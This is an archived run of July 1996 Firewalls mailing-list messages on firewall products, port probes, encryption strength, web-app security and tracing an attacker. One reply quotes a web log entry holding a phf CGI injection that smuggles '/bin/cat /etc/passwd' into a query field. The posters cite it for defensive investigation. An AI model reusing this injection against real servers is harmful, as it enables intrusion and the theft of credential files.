Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. see Recursive From firewalls-owner Fri Jul 12 13:33:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08359 for firewalls-outgoing; Fri, 12 Jul 1996 12:29:54 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA08343 for ; Fri, 12 Jul 1996 12:29:46 -0700 (PDT) Received: from mail.rc.toronto.on.ca by relay4.UU.NET with SMTP Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0) Message-ID: From: Russ To: "'Matthew Keenan'" Cc: "'Firewalls'" Subject: RE: Dirty Dogs Date: Fri, 12 Jul 1996 08:48:20 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone got any ideas as to how we can make AOL more responsive to the security issues their users create? You don't see these types of problems originating from Compuserve. I realize that hackers could go to other resources, but the simple fact is that AOL generates more email bombers, faked email, and probing hackers than any other single source, and their abuse@aol.com address is next to useless. I've sent messages as Postmaster@, which should be treated with a modicum of respect, and received nothing more than an auto-reply, never, ever, a single personal response. Netcom is not much better. AOL has to become more responsive to the security issues they are creating through their marketing. Giving away free access may get them more customers, but its done at the expense of the rest of the Internet. And for those wondering what to do with sites that are run by hackers, the easiest thing is to contact their ISP. If you contact a site and don't get a response, or don't get a satisfactory response, then move up the traceroute. Cheers, Russ From firewalls-owner Fri Jul 12 13:35:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA04202 for firewalls-outgoing; Fri, 12 Jul 1996 11:50:29 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA04188 for ; Fri, 12 Jul 1996 11:50:12 -0700 (PDT) Received: from hidata.com by relay4.UU.NET with SMTP Received: by hidata.com; id AA21213; Fri, 12 Jul 96 09:08:59 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Fri, 12 Jul 1996 09:08:56 -0700 Message-Id: <199607121608.JAA04305@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: Sidewinder Versus EagleRaptor Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I compared Eagle NT features with Gauntlet (I know, not fair)=20 and compiling a list of the proxies turned out to be educational. Eagle NT 3.0 Gauntlet 3.1 =B7 Transparent Telnet =B7 Transparent Telnet =B7 Authenticated Telnet =B7 Authenticated Telnet =B7 Transparent Http =B7 Transparent Http =B7 Proxied Http =B7 Proxied Http =B7 Proxied Gopher =B7 Proxied Gopher =B7 Transparent FTP =B7 Transparent FTP =B7 Authenticated FTP =B7 Authenticated FTP =B7 Transparent SMTP =B7 SMAP/Sendmail (No sendmail/mail relay =20 capabilities) =20 =B7 rlogin =B7 rsh =B7 X-11 =B7 Finger =B7 Printer =B7 POP3 =B7 Administrative GUI (info-gw) Non-proxied service for NNTP, Whois, Real Audio, quotd, (unauthenticated, directionally savvy port 'service(s)'): =B7 Proxyd =B7 plug-gw Eagle also includes 'Generic pass-through', an unauthenticated,=20 directionally clueless open port 'service'. Must be the only=20 'real way' to punch a hole in your firewall. Authentication methods supported: Eagle NT Gauntlet =B7 S/Key =B7 S/Key =B7 Password list =B7 Enigma Logistics devices =B7 SecureID (Security Dynamics) =B7 SecurNet (Digital Pathways) =B7 CryptoCard =B7 DigiPass A more fair comparison would be with the Eagle Raptor UNIX vs.=20 Gauntlet. Feel free to correct my list! Bill Stout At 01:43 PM 7/10/96 MDT, you wrote: >My organization is finally coming close to making a decision on a firewall= =20 >product. My question is this: is there anyone in this group who has=20 >evaluated both Sidewinder and EagleRaptor within the past year and has: > >1) selected EagleRaptor but now wishes they had gone with Sidewinder > >2) selected Sidewinder but now wishes they had gone with EagleRaptor > >3) selected EagleRaptor for NT and is experiencing difficulties or is= elated > >You can respond privately to me at jbarnett@micron.net, please. Since this= is=20 >the first time I have tried to post anything to this group (I just joined= =20 >today), please forgive me if I somehow stepped on any rules for posting. = =20 >Thanks! jon > >######################################################### >Jon Barnett jbarnett@micron.net=09 > (208) 384-7018=20 >"Colorful ideas are a pigment of your own imagination" >######################################################### > > <=3D=3D=3D=3D=3D=3D=3D10=3D=3D=3D=3D=3D=3D=3D=3D20=3D=3D=3D=3D=3D=3D=3D=3D30= =3D=3D=3D=3D=3D=3D=3D=3D40=3D=3D=3D=3D=3D=3D=3D=3D50=3D=3D=3D=3D=3D=3D=3D=3D= 60=3D=3D=3D=3D=3D=3D=3D=3D70=3D=3D=3D=3D=3D=3D=3D=3D80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body,= spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with= 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get= you... ----------------------------------------------------------------------------= ---- From firewalls-owner Fri Jul 12 13:47:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08497 for firewalls-outgoing; Fri, 12 Jul 1996 12:31:04 -0700 (PDT) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA08410 for ; Fri, 12 Jul 1996 12:30:37 -0700 (PDT) Received: from apu.connectix.com by relay2.UU.NET with ESMTP Received: from [204.118.199.198] (snowball.connectix.com [204.118.199.198]) by apu.connectix.com (8.7.5/8.6.9) with SMTP id IAA03298 for ; Fri, 12 Jul 1996 08:41:35 -0700 Date: Fri, 12 Jul 1996 08:41:35 -0700 Message-Id: <199607121541.IAA03298@apu.connectix.com> Subject: POP exploits From: Rob Sansom To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I occasionally get a burst of TCP packets to port 110 on our web server, which does not run a pop 3 server or any such thing. Here's a good example: Jul 11 20:23:20 gate247159.connectix.com 8774: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 1 packet Jul 11 20:29:09 gate247159.connectix.com 8775: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 117 packets Jul 11 20:33:29 gate247159.connectix.com 8776: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 1 packet Jul 11 20:34:09 gate247159.connectix.com 8777: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 89 packets Jul 11 20:39:09 gate247159.connectix.com 8778: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 136 packets Jul 11 20:43:35 gate247159.connectix.com 8779: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 1 packet Jul 11 20:45:09 gate247159.connectix.com 8780: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 120 packets Jul 11 20:49:09 gate247159.connectix.com 8781: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 271 packets Jul 11 20:53:34 gate247159.connectix.com 8782: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1679) -> 204.247.159.244(110), 1 packet Jul 11 20:54:09 gate247159.connectix.com 8783: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 195 packets Jul 11 20:56:08 gate247159.connectix.com 8784: %SEC-6-IPACCESSLOGP: list 120 I know it's not an employee trying to collect their mail, since all of these connection attempts have come from places like Malaysia, Washington State (above - ixa.net), and other such places where they have no business being. Also, they know that our POP server is not accessable from outside. This leads me to believe that the above log entries are attacks, and I'm puzzled as to what they may be trying to attempt. The web server is our most visable machine, so I guess thats why they are targeting it. Any Ideas?? Thanks in advance, Rob Sansom Network Admin. Connectix Corp (415) 638-7398 sansom@connectix.com From firewalls-owner Fri Jul 12 14:10:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA09103 for firewalls-outgoing; Fri, 12 Jul 1996 12:35:06 -0700 (PDT) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA09063 for ; Fri, 12 Jul 1996 12:34:46 -0700 (PDT) Received: from mailbox.neosoft.com by relay6.UU.NET with ESMTP Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id KAA03506; Fri, 12 Jul 1996 10:10:01 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA00141; Fri, 12 Jul 1996 10:02:34 -0500 Received: by sonic.nmti.com; id AA01386; Fri, 12 Jul 1996 10:02:33 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607121502.AA01386@sonic.nmti.com.nmti.com> Subject: Re: CISCO network level encryption & key lengths To: ckostick@ashton.csc.com (Chris Kostick) Date: Fri, 12 Jul 1996 10:02:33 -0500 (CDT) Cc: adam@homeport.org, firewalls@GreatCircle.COM In-Reply-To: <199607120149.VAA17727@mccoy.ashton.csc.com> from "Chris Kostick" at Jul 11, 96 09:49:31 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This is kind of the point I'm driving at. Any bad guy won't do this. The > bad guys in question here aren't trying to look at love letters. They want > to steal some serious information if they're going to the trouble of > attacking an encryption code. Therefore, I don't think the bad guys would > risk using other peoples machines to do this. You underestimate loonies. Dimitri Vulis forged hundreds of obscene solicitations in the name of one of Jan Isley's associates to get Jan kicked off Emory University's system. If someone crazy enough decides you're interesting cracking a lab full of workstations is nothing. That's way less obtrusive than what Vulis did. You're also forgetting the massive growth in computer power. "A lab full of machines" will be "one hot system" in five years, and "everyone's kid's videogame console" in ten. So if you have a secret that's not going to be worth anything in five years be my guest and use a 40 bit cypher. From firewalls-owner Fri Jul 12 14:14:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12078 for firewalls-outgoing; Fri, 12 Jul 1996 12:53:36 -0700 (PDT) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA11995 for ; Fri, 12 Jul 1996 12:53:08 -0700 (PDT) Received: from giascl01.vsnl.net.in by relay3.UU.NET with SMTP Received: by giascl01.vsnl.net.in; (5.65v3.2/1.1.8.2/27Apr96-1140PM) Date: Fri, 12 Jul 1996 22:50:36 +0500 (GMT+0500) From: Kaustubh Kundu To: firewalls@greatcircle.com Subject: A little off topic - BIOS details for security Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Floks, I am trying to compile the details of different BIOS-s which support the change of Boot Sequence i.e. change over to C: A: instead of normal A: C:. Most the present day's BIOS support this but unfortunately there is no standard of how you access the screen to change this parameter. Can anybody lead me to any pointer(s) or some reference so that I can compile this details ? Thanks in advance, KK From firewalls-owner Fri Jul 12 14:47:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12777 for firewalls-outgoing; Fri, 12 Jul 1996 12:57:43 -0700 (PDT) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA12672 for ; Fri, 12 Jul 1996 12:57:16 -0700 (PDT) From: mdr@vodka.sse.att.com Received: from ihgw2.att.com by relay3.UU.NET with SMTP Received: from vodka.sse.att.com by ihig2.att.att.com (SMI-8.6/EMS-1.2 sol2) Message-Id: <199607121640.LAA08295@ihig2.att.att.com> Subject: Re: Extending Financial Applications And Protecting via a Firewall To: allyn@allyn.com (Mark Allyn 206-860-9454) Date: Fri, 12 Jul 1996 12:46:13 -0400 (EDT) Cc: howzit@worldnet.att.net, Firewalls@GreatCircle.COM In-Reply-To: <199607120238.TAA04199@mark.allyn.com> from "Mark Allyn 206-860-9454" at Jul 11, 96 07:38:18 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Allyn wrote: > > Best solution is to use the secure socket layor (SSL) that Netscape > has allready built into their web browsers. You would need the > domestically available 128 bit key version; not the exportable > 40 bit key version that has been decrypted via brute force [snip] > > Then set up password authentication on your web server. Since you > will be using SSL, the username and password will be passed under > cover over the net and cannot be sniffed. How will you maintain a "session" for the user. Remember http is stateless. I've heard of people using cookies or hidden fields for this type of session maintenance, does anybody know the details of how this is done and whether or not it is secure? What about spoofing the remote host via DNS hacks. If I can divert the users browser to a mirror site and trick them into revealing their password, then the game is up. End-to-end encryption doesn't defeat man-in-the-middle (or wrong-man-to-start-with) unless you use some form of strong authentication. Does the current generation of SSL support public certificates of the servers to prevent such? I skipped ahead to the SSL 3.0 docs and it does support certificates and sessions. Guess I'll have to go back and read the 2.0 docs. The Open Market product maintains sessions by passing the user a "ticket" embedded in the URL. Its really a pretty slick scheme that works with unmodifed browsers. However I'm not sure whether or not the industry will rally around that type of approach or go for something else. How do you see password schemes w.r.t client certificates? The password has the advantage of travelling with the user so that s/he can gain access from any site. However passwords may be guessable. The SSL encryption at least prevents sniffing the password, but the password still has the undesirable quality that it has to be given away to be used. > > On this server, along with the SSL capable web server, install > the Oracle SQL Net client software. Don't install the database > itself here. That should be installed on another machine on > the company's internal network. Actually, best here to install the > newer Oracle Secure SQL Net on both the web server and the internal > machine with the Oracle database. Be carefull though, the Oracle > database must be of a certain revision (7.3, I believe), in order > for secure SQL net to work. Is there an open solution that would work with any database? > > Install this secure dedicated web server on its own lan segment > segment between two filters. The outer filter should allow only > http traffic from the outside to touch the web server. No mail, > telnet, ftp, or anything else. The inside filter should allow only > SQL Net traffic to go from the web server to the inside network > and only to the one machine that has the database. Nothing > else should be allowed through the inside filter except for > possibly telnet FROM the INSIDE to the web server to facilitate > maintenace on it, although best is to do all maintenance on > the box itself from the console. Probably best to have both > boxes in the same (secured) physical location to facilitate > maintenance. Good ideas. One problem: Host security. The SQL/Web server is still an attack point. If the host becomes compromised, then the attacker could launch bogus SQL requests. I think that client certificates are part of the answer here. Of course they only force the attacker to be customer of the financial firm (or compromise the users PC), but that's a step forward. Another approach is to use intrusion detection software on the host to monitor the SQL and Http servers. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Jul 12 15:11:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA17803 for firewalls-outgoing; Fri, 12 Jul 1996 13:38:13 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA17793 for ; Fri, 12 Jul 1996 13:38:05 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id NAA11275; Fri, 12 Jul 1996 13:28:12 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id NAA19347; Fri, 12 Jul 1996 13:33:59 -0700 (PDT) From: Brian Murrell Message-Id: <199607122033.NAA19347@mocha.bctel.net> Date: Fri, 12 Jul 1996 13:33:58 -0700 (PDT) To: bve@omsk.yourtown.com Cc: firewalls@GreatCircle.COM Subject: Re[2]: Dirty Dogs In-Reply-To: <9607120022.AA13435@omsk.yourtown.com> X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of bve@omsk.yourtown.com (BVE) on scroll <9607120022.AA13435@omsk.yourtown.com> > 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET > /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 - > > > whois -h rs.internic.net 152.169.232.0 > No match for "152.169.232.0". > > This person seems to have covered their tracks pretty well. Any ideas on > tracking them?? Not really. You just have to know how to ask the whois servers. 152.* is a class b address. I would first try a class c lookup in case it has been subnetted and registered... $ whois 152.169.232 | more No match for "152.169.232". The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. failing that, try the class b... $ whois 152.169 | more Advanced Network & Services, Inc. (NET-ANS-BNET14) 100 Clearbrook Rd Elmsford, NY 10523 Netname: ANS-BNET14 Netnumber: 152.169.0.0 Coordinator: Mackey, Bruce (BM814) Mackey@AOL.COM 703-453-4414 Alternate Contact: ANS Network Operations Center (ANS-NOC) noc@ans.net 1-800-456-6300 Domain System inverse mapping provided by: HP81.PROD.AOL.NET 192.203.190.18 OPS01.OPS.AOL.COM 152.163.80.11 DNS-AOL.ANS.NET 198.83.210.28 Record last updated on 29-Nov-95. The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. There you go. ANS. That was likely doled out to somebody, so call ANS and ask them. If they aren't going to go to the effort of updating the whois database, they should be expected to answer queries about who owns it. That reminds me, the CA registrar owes me a phone call... b. -- Brian J. Murrell Brian_Murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5279 From firewalls-owner Fri Jul 12 15:17:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA23410 for firewalls-outgoing; Fri, 12 Jul 1996 14:16:21 -0700 (PDT) Received: from wichita.fn.net (wichita.fn.net [204.233.71.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA23343 for ; Fri, 12 Jul 1996 14:15:58 -0700 (PDT) Received: (from bkmarsh@localhost) by wichita.fn.net (8.7.4/8.6.9) id QAA05927; Fri, 12 Jul 1996 16:12:43 -0500 (CDT) Date: Fri, 12 Jul 1996 16:12:40 -0500 (CDT) From: "Bruce M." X-Sender: bkmarsh@wichita.fn.net To: firewalls@GreatCircle.COM Subject: Re: Freeware In-Reply-To: <9607121457.AA42616@pamela.sic.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jul 1996, Stefan Berg wrote: > My experience with freeware or any other firewall software for that > matter is that it very much depends on _configuration_ rather than > the quality of the software. > > I mean, what's the use of a super_duper_mega_expensive_and_great firewall > if you don't know hot to set it up in a secure fashion? True. But what is the good of a simple proxy server if it won't let you implement the types of restrictions and privledges that you want to allow? Basically, you need a precise mix of both good configuration and good quality. Some people aren't willing to pay for both. From firewalls-owner Fri Jul 12 15:18:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA24657 for firewalls-outgoing; Fri, 12 Jul 1996 14:23:52 -0700 (PDT) Received: from sun.aitc.rest.tasc.com (sun.aitc.rest.tasc.com [147.81.50.129]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA24366 for ; Fri, 12 Jul 1996 14:22:34 -0700 (PDT) Received: from saturn by sun.aitc.rest.tasc.com (NX5.67e/NX3.0M) From: "Philip C. Hyland" Message-Id: <9607122218.AA01536@sun.aitc.rest.tasc.com> Received: by saturn.aitc.rest.tasc.com (NX5.67d/NX3.0X) Date: Fri, 12 Jul 96 17:26:49 -0300 Received: by NeXT.Mailer (1.100) Received: by NeXT Mailer (1.100) To: firewalls@GreatCircle.com Subject: What Parameters are Critical to Firewall Mgt? Cc: pchyland@tasc.com Reply-To: pchyland@tasc.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am trying to develop the basics of a firewall MIB. From a administrative and security monitoring point of view, I need to know what are key to detecting problems, and which items need to ne changed in response to different conditions. I am interesting in contacting others who have an interest or knowledge of firewall security applications that may benefit from a consolidated management concept. Referrals to key personnel in software research and development and security operations would be highly appreciated. My overall research goal is to use SNMP to instrument security applications (such as an IDS, firewalls or S-HTTP) in order to provide more effective configuration, status and control. My belief is that a common security management framework that interacts with several different application may be a more efficient and effective tool than several standalone tools. References to any previous/related work in this area would be useful. Thanks. From firewalls-owner Fri Jul 12 15:26:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA22891 for firewalls-outgoing; Fri, 12 Jul 1996 14:13:32 -0700 (PDT) Received: from red8.cac.washington.edu (red8.cac.washington.edu [140.142.55.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA22682 for ; Fri, 12 Jul 1996 14:12:49 -0700 (PDT) Received: from localhost by red8.cac.washington.edu Date: Fri, 12 Jul 1996 14:09:37 -0700 (PDT) From: Dave Dittrich Reply-To: Dave Dittrich To: Firewalls@GreatCircle.COM Subject: Re: Dirty dogs In-Reply-To: <199607121951.MAA11778@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > whois -h rs.internic.net 152.169.232.0 > No match for "152.169.232.0". > ... > ...and nslookup: > > nslookup 152.169.232.79 > Server: omsk.yourtown.com > Address: 205.246.66.7 > > Name: [152.169.232.79] > Address: 152.169.232.79 > > - ----------------------------- > > This person seems to have covered their tracks pretty well. Any ideas on > tracking them?? Try "traceroute" for IP addresses with no DNS names: # traceroute to 152.169.232.79 (152.169.232.79), 30 hops max, 40 byte packets ... 16 enss150.t3.ans.net (204.151.29.10) 125 ms 121 ms 129 ms 17 inet3-gw.blue.aol.com (198.81.0.43) 121 ms 117 ms 117 ms 18 * inet5-gw.blue.aol.com (152.163.15.2) 121 ms 117 ms 19 inet6-gw.blue.aol.com (152.163.15.26) 152 ms * 121 ms 20 inet15-gw.blue.aol.com (152.163.15.77) 117 ms 117 ms 199 ms 21 iptr2-r3.proxy.aol.com (152.163.193.60) 219 ms 117 ms 117 ms 22 ipt-i1.blue.aol.com (152.163.191.121) 121 ms 117 ms 148 ms 23 ipt-i1.blue.aol..com (152.163.191.121) 125 ms !H 125 ms !H 117ms !H It looks like you want to talk to AOL administators. -- Dave Dittrich Client Services, Computing & Communications dittrich@cac.washington.edu University of Washington Dave Dittrich / dittrich@cac.washington.edu From firewalls-owner Fri Jul 12 15:36:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA29171 for firewalls-outgoing; Fri, 12 Jul 1996 14:52:45 -0700 (PDT) Received: from case.cyberspace.com (case.cyberspace.com [199.2.48.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA29159 for ; Fri, 12 Jul 1996 14:52:39 -0700 (PDT) Received: from case.cyberspace.com ([199.2.48.12]) by case.cyberspace.com Date: Fri, 12 Jul 1996 14:50:24 -0700 (PDT) From: billcurr@cyberspace.com (Bill Curr) To: firewalls@GreatCircle.COM Subject: Microsoft FrontPage Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know this is not specifically on Firewalls, though it may lead to some discussion on where to place Web servers... what is the feeling regarding MicroSoft's FrontPage, particularly the Server Extensions? This seems to be a new breed of product giving the user some (limited) sysadmin privileges... personally the product makes me nervous, particularly the way it handles CGI and .SHTML files... this is not because I am a MicroPhobe as I run NT Server. Any thoughts or experiences out there? Thanks. -Bill From firewalls-owner Fri Jul 12 15:51:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA26018 for firewalls-outgoing; Fri, 12 Jul 1996 14:32:40 -0700 (PDT) Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA25896 for ; Fri, 12 Jul 1996 14:32:09 -0700 (PDT) Received: from mail.amer.net by relay7.UU.NET with ESMTP Date: Fri, 12 Jul 1996 12:30:31 -0400 (EDT) Message-Id: Received: from mail.amer.net ([205.229.116.59]) by mail.amer.net X-Sender: jsong@mail.amer.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Ginger Subject: Who should Handle Data Encryption? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Would anyone like to share your experience regarding secure data transfer on the Internet/Intranet: Should our network people set up secure (i.e., data encryption) communication channels for all protocols, or should mainly install a file encryption utility and let the user decided which application is necessary to be encrypted? The concern here is that the 1st option may be secure but slow down the entire data communiaction; the 2nd option may have efficient data communication but user-training and implementation of security-policy can be hactic. May be there is a middle-way to handle this? From firewalls-owner Fri Jul 12 15:52:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA29235 for firewalls-outgoing; Fri, 12 Jul 1996 14:53:20 -0700 (PDT) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA29213 for ; Fri, 12 Jul 1996 14:53:08 -0700 (PDT) Received: from lexicon.ins.com by relay1.UU.NET with ESMTP Received: from user_ins.ins.com ([206.98.131.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id KAA10706 for ; Fri, 12 Jul 1996 10:12:04 -0700 (PDT) Message-Id: <2.2.32.19960712170812.00bf1cd8@ins.com> X-Sender: martin_d@ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 Jul 1996 13:08:12 -0400 To: firewalls@greatcircle.com From: Darwin Martinez Subject: RealAudio2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All: I've upgraded FW-1 to ver 2.1 for supporting real audio 2. I see the "radio" tcp connect go out, but FW-1 is blocking the return udp service. My rulebase is setup to allow tcp / udp real audio, but I'm still blocking it. Anyone using FW-1 & real audio? IF so, I'd appreciate any suggestions. Thanks in advance. ------------------------------------------------------------------------ Darwin L. Martinez Email: darwin_martinez@ins.com Network Systems Engineer Site #: 404-843-5954 International Network Services Pager: 800-INS-1-INS Atlanta Office "To run with the big dogs, you gotta get off the porch!" ------------------------------------------------------------------------ From firewalls-owner Fri Jul 12 16:03:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05091 for firewalls-outgoing; Fri, 12 Jul 1996 15:40:29 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA05066 for ; Fri, 12 Jul 1996 15:40:19 -0700 (PDT) Received: from phoenix.iss.net by relay4.UU.NET with SMTP Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id KAA02443; Fri, 12 Jul 1996 10:45:10 -0400 Message-Id: <199607121445.KAA02443@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: Darren Reed Date: Fri, 12 Jul 1996 10:46:18 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: firewall certification (was Re: NCSA) Reply-to: alexf@iss.net CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > What's more, I seem to get rather interesting advertising material from > a local reseller of ISS's scanner which points out that a number of > commerical firms which do auditting and consulting use it to verify or > audit firewalls. Whilst it is a start, it is by no means comprehensive I don't know what that particular reseller is doing with the scanner as far as firewall audits go (I'm sure someone here does though). You are correct. It is a start, but by no means complete. NCSA uses our scanner for the same purposes here in the US, but it is used in conjunction with other tests (mostly "homegrown" by the NCSA, I imagine). Using ONLY the scanner to certify firewalls *can* mislead the end consumer, especially since our scanner is more of a general network prober than a specific firewall tester. We here at ISS realize this and are working on expanding our product line greatly in the coming few months. We will be selling an actual suite of applications (called SAFEsuite). We will be selling scanners that are more suited to specific situations. IOW, in addition to our Scanner, we will be selling a COPS-type of internal scanner, a firewall specific scanner, and others (all of this stuff is being ported to NT as well for those who wish to use NT over UNIX). It might be prudent to ask the reseller what else they are using to test the firewalls (homegrown tests, etc.). I imagine (though *I* do not know for sure) that their tests encompass a greater range of tests on firewalls than just what is in the scanner. Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Fri 